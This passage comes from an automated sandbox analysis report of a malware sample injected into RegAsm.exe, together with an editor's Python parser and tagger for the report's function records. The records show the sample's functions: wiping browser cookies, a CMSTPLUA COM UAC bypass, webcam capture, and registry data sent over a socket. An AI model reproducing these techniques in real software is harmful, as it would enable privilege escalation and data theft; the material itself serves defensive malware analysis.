                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                          • API String ID: 1133728706-4073444585
                                                          • Opcode ID: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                                                          • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                          • Opcode Fuzzy Hash: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                                                          • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
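The records in this listing are easier to triage when the API calls, subcall attributions and decoded strings are pulled out of the rendered text and combined per function. What follows is an added example written by the editor, not code from Joe Sandbox or from the analysed sample: a small parser for the record format used on this page plus a capability tagger whose rules are keyed to records visible here. The rules are the editor's heuristics: registry enumeration APIs and send() in one call tree (the enumeration routine at 00413A55 reached together with the socket routine at 00404AA1), the IE cookie strings beside PathFileExistsA, and CoGetObject beside the string ucmCMLuaUtilShellExecMethod, which is the function name UACMe uses for its CMSTPLUA ICMLuaUtil::ShellExec elevation method and is consistent with the report's "Contains functionality to bypass UAC (CMSTPLUA)" signature. Two assumptions about the format: a record ends at its Instruction Fuzzy Hash line, and "$" separates the strings of a String ID line. The sample input is a constructed, abridged copy of four records from this page (argument lists shortened, some lines dropped), with the last one cut off as it is at the end of the listing.

```python
"""Parser and capability tagger for Joe Sandbox function records in the
"APIs / Memory Dump Source / Similarity" format. Editor's added example."""
import re
from dataclasses import dataclass, field

# Assumed format: one record per function, ending at its "Instruction Fuzzy
# Hash" line (or at end of input when cut off); "$" joins String ID strings.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z][A-Z0-9_]*)(?:\(|\s+ref:)")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s?(?P<value>.*)$")
SOURCE_RE = re.compile(r"Source File:\s*(?P<file>\S+?),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+)")
REG_ENUM = {"RegEnumKeyExA", "RegEnumKeyExW", "RegEnumValueA", "RegEnumValueW",
            "RegQueryInfoKeyA", "RegQueryInfoKeyW"}
CRT_MODULES = {"LIBCMT", "LIBVCRUNTIME", "LIBCPMT"}   # statically linked runtime


@dataclass
class Function:
    apis: list = field(default_factory=list)    # (name, module, via_subcall)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # API ID, Opcode ID, hashes ...
    dump: str = ""                              # .sdmp the code came from
    base: int = 0                               # image base of that dump

    def api_names(self):
        return {name for name, _, _ in self.apis}

    def direct_modules(self):
        return {mod for _, mod, via_sub in self.apis if not via_sub}


def parse_listing(text):
    funcs, cur = [], Function()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur.apis.append((m["name"], m["module"], m["caller"] is not None))
            continue
        m = SOURCE_RE.search(line)
        if m:
            cur.dump, cur.base = m["file"], int(m["base"], 16)
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue                       # bare labels: APIs, Strings, Similarity
        key, value = m["key"].strip(), m["value"].strip()
        if key == "String ID":
            cur.strings = [s for s in value.split("$") if s]
        else:
            cur.fields[key] = value
        if key == "Instruction Fuzzy Hash":   # last field of a complete record
            funcs.append(cur)
            cur = Function()
    if cur.apis or cur.fields:             # record cut off at end of listing
        funcs.append(cur)
    return funcs


def classify(fn):
    """Tag by API + string co-occurrence; one API alone proves little."""
    names, text, tags = fn.api_names(), " ".join(fn.strings).lower(), set()
    if names & REG_ENUM and "send" in names:
        tags.add("registry-enum-to-socket")       # enumeration handed to a socket
    if "PathFileExistsA" in names and "cookies" in text and "user shell folders" in text:
        tags.add("ie-cookie-wipe")
    if "CoGetObject" in names and "ucmcmluautil" in text:
        tags.add("com-elevation-uacme-marker")    # UACMe method name left in
    if fn.apis and fn.direct_modules() <= CRT_MODULES:
        tags.add("crt-runtime")                   # compiler runtime, low value
    return tags


# Constructed input: four records abridged from this page; the last is cut off.
SAMPLE = r"""
APIs
• RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
  • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF), ref: 00413AEB
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: CloseEnumInfoOpenQuerysend
• String ID: xUG$NG$NG$TG
• Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
APIs
  • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
• ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
• PathFileExistsA.SHLWAPI(?), ref: 0040BF78
• API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
• Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
APIs
  • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F), ref: 00446798
• _free.LIBCMT ref: 00450F48
• API ID: _free$ErrorFreeHeapLast
• String ID:
• Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
APIs
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004075D0
  • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
• CoUninitialize.OLE32 ref: 00407629
• API ID: InitializeObjectUninitialize_wcslen
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
"""
```

Running `for fn in parse_listing(SAMPLE): print(fn.fields.get("API ID"), sorted(classify(fn)))` tags the first record as registry enumeration feeding a socket, the second as the IE cookie wiper, the third as CRT noise and the truncated fourth as the COM elevation routine. Tagging on co-occurrence rather than on single imports matters here because the same RegEnumKeyExW and _free calls appear in the benign runtime code that fills most of this listing; the subcall attribution is what ties the enumeration at 00413A55 to the send() at 00404AA1 in one function.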
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                                                          • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                          • Opcode Fuzzy Hash: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                                                          • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                          APIs
                                                            • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                          • _free.LIBCMT ref: 00450F48
                                                            • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00450F53
                                                          • _free.LIBCMT ref: 00450F5E
                                                          • _free.LIBCMT ref: 00450FB2
                                                          • _free.LIBCMT ref: 00450FBD
                                                          • _free.LIBCMT ref: 00450FC8
                                                          • _free.LIBCMT ref: 00450FD3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                          • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                          • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                          APIs
                                                            • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                          • _free.LIBCMT ref: 100092AB
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 100092B6
                                                          • _free.LIBCMT ref: 100092C1
                                                          • _free.LIBCMT ref: 10009315
                                                          • _free.LIBCMT ref: 10009320
                                                          • _free.LIBCMT ref: 1000932B
                                                          • _free.LIBCMT ref: 10009336
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                          • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                          • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                          • int.LIBCPMT ref: 00411183
                                                            • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                            • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                          • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                          • String ID: (mG
                                                          • API String ID: 2536120697-4059303827
                                                          • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                          • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                                          • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                          • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                          • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
                                                          • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                          • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                          • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                          • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                          APIs
                                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004075D0
                                                            • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                            • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                          • CoUninitialize.OLE32 ref: 00407629
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                          • API String ID: 3851391207-1839356972
                                                          • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                          • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                          • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                          • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                          APIs
                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                                          • GetLastError.KERNEL32 ref: 0040BAE7
                                                          Strings
                                                          • UserProfile, xrefs: 0040BAAD
                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                                          • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                                          • [Chrome Cookies not found], xrefs: 0040BB01
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteErrorFileLast
                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                          • API String ID: 2018770650-304995407
                                                          • Opcode ID: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                                                          • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                                          • Opcode Fuzzy Hash: ad6ae7ff657ff4a30210cd1c10e5c69c8194eac217f6538686f2b1907c56e876
                                                          • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                                          APIs
                                                          • __allrem.LIBCMT ref: 0043AC69
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                                          • __allrem.LIBCMT ref: 0043AC9C
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                                          • __allrem.LIBCMT ref: 0043ACD1
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                          • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                                          • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                          • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                          • __freea.LIBCMT ref: 10008A08
                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                          • __freea.LIBCMT ref: 10008A11
                                                          • __freea.LIBCMT ref: 10008A36
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1414292761-0
                                                          • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                          • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                          • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                          • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,0040D262), ref: 004044C4
                                                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prologSleep
                                                          • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                          • API String ID: 3469354165-3054508432
                                                          • Opcode ID: d42d166ef557013daffa9f0694fdf7832456630aeab69a2e5028fc491a4160c5
                                                          • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                          • Opcode Fuzzy Hash: d42d166ef557013daffa9f0694fdf7832456630aeab69a2e5028fc491a4160c5
                                                          • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __cftoe
                                                          • String ID:
                                                          • API String ID: 4189289331-0
                                                          • Opcode ID: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                                                          • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                          • Opcode Fuzzy Hash: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                                                          • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                          APIs
                                                          • _strlen.LIBCMT ref: 10001607
                                                          • _strcat.LIBCMT ref: 1000161D
                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                          • lstrcatW.KERNEL32(?,?), ref: 1000165A
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                          • lstrcatW.KERNEL32(00001008,?), ref: 10001686
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrcatlstrlen$_strcat_strlen
                                                          • String ID:
                                                          • API String ID: 1922816806-0
                                                          • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                          • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                          • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                          • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,?), ref: 10001038
                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                          • String ID:
                                                          • API String ID: 3594823470-0
                                                          • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                          • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                          • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                          • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                          • String ID:
                                                          • API String ID: 493672254-0
                                                          • Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                          • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                                          • Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
                                                          • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                          • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastValue___vcrt_
                                                          • String ID:
                                                          • API String ID: 3852720340-0
